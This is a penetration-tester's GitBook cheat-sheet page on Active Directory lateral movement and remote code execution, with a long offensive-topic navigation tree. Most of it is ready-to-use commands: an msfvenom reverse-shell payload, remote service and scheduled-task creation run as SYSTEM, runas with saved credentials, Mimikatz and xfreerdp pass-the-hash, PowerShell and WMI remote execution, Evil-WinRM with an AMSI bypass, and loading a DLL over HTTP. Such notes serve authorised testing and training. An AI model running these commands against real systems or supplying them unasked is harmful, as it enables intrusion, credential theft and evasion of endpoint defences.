📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • Remote administration
  • Scheduler
  • RunAs
  • WMI
  • RDP
  • Powershell remoting
  • Manage sessions
  • Code execution
  • Powershell + WMI module
  • Connect to WMI
  • Execute command
  • Create service
  • Create scheduled task
  • Install MSI package
  • Evil-WinRM
  • In-memory execution + AMSI Bypass
  • Dll loader
  1. Active Directory

Connection

Remote administration

Scheduler

Note that executables created by msfvenom to be used by a service have to be created with type exe-service instead of exe to prevent the shell from dying after the task is completed.

msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=<ip> LPORT=<port> -o <filename>.exe

With sc.exe

sc.exe \\<host> create <service name> binPath="<cmd>" start=auto
sc.exe \\<host> start <service name>

With schtasks

schtasks /s <host> /RU "SYSTEM" /create /tn "<task name>" /tr "<cmd or payload>" /sc ONCE /sd 01/01/1970 /st 00:00 
schtasks /s <host> /run /TN "<task name>"

RunAs

Run with stored credentials

cmdkey /list                                      //get a list of credentials, runas will use the ones in memory
runas /savecred /user:<domain>\<user> "\\<ip>\<path>"      //connect to share
runas /savecred /user:<domain>\<user> "cmd.exe /k <cmd>"   //run command as user

Run by specifying username and password

runas /env /noprofile /user:<domain>/<user> <password> "cmd.exe /k <cmd>"
runas /netonly /user:<domain>\<user> "cmd.exe /k <cmd>"

Run as another user on the same machine

runas /user:<user> "cmd.exe /k <cmd>"

WMI

Execute code

wmic.exe /user:<user> /password:<pass> /node:<host> process call create "cmd.exe /c <cmd>"

Run local msi installer

wmic.exe /user:<user> /password:<pass> /node:<host>  product call install PackageLocation="<path to msi>"

RDP

Mimikatz

privilege::debug
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash> /run:"mstsc.exe /restrictedadmin"

Xfreerdp

xfreerdp +clipboard /dynamic-resolution /cert-ignore /u:<user> /pth:<ntlm hash> /v:<host>

Powershell remoting

Manage sessions

Enable remoting (Administrative privileges required)

Enable-PSRemoting

connect to machine

Enter-PSSession -ComputerName <fqdn>

Store session data and connect

$<varname>= New-PSSession -ComputerName <fqdn>
Enter-PSSession -Sessions <varname>

Code execution

Invoke-Command

//disable limit on laguage, enable scriptlets
Invoke-Command -ComputerName <fqdn> -ScriptBlock {$ExecutionContext.SessionState.LanguageMode}

Invoke-Command -ComputerName <fqdn> -ScriptBlock {<code>} 
Invoke-Command -ComputerName <fqdn> -FilePath <path>    //script from file

Code execution with valid credentials

Load credentials

$session = New-PSSession -ComputerName <fqdn>
$secPassword = ConvertTo-SecureString '<pass>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb.local\<username>', $secPassword)

Execute command

Invoke-Command -ComputerName <fqdn> -Credential $cred -ScriptBlock {<commands>}

Run a PowerShell script remotely

Invoke-Command -Credential $cred -ComputerName <fqdn> -FilePath <path to ps1 file> -Session $session

Powershell + WMI module

Connect to WMI

Store credentials

$username = '<user>';
$password = '<pass>';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

Start session. WMI supports two protocols: DCOM (port 135 and 49152-65535) or Wsman (ports 5985 and 5986)

$Opt = New-CimSessionOption -Protocol <DCOM|Wsman>
$Session = New-Cimsession -ComputerName <host> -Credential $credential -SessionOption $Opt -ErrorAction Stop

Execute command

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = "<cmd>"
}

Create service

Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "<name>";
DisplayName = "<name>";
PathName = "<payload>";
ServiceType = [byte]::Parse("16");
StartMode = "Manual"
}

Retrieve and start the service

$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE '<name>'"
Invoke-CimMethod -InputObject $Service -MethodName StartService

Create scheduled task

$Command = "<executable i.e. cmd, powershell...>"
$Args = "<args>"

$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "<name>"
Start-ScheduledTask -CimSession $Session -TaskName "<name>"

Install MSI package

Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "<path to msi>"; Options = ""; AllUsers = $false}

Evil-WinRM

Ps1 files must be stored in path specified by -s option. To execute a script simply type its name in the console.

evil-winrm -i <ip> -u Administrator -p <password>
evil-winrm -i <ip> -u Administrator -H <hash>

In-memory execution + AMSI Bypass

menu
Bypass-4MSI
Invoke-Binary <path to local compiled file>

Dll loader

Dll-loader -http -path http://<path to .dll>
Dll-loader -smb -path \\<share>\\<file>.dll
Dll-loader -local -path C:\<path to dll>
PreviousDomain Controller specificNextPass The Hash

Last updated 1 year ago

Find pre-compiled binaries for in-memory execution here:

https://github.com/Flangvik/SharpCollection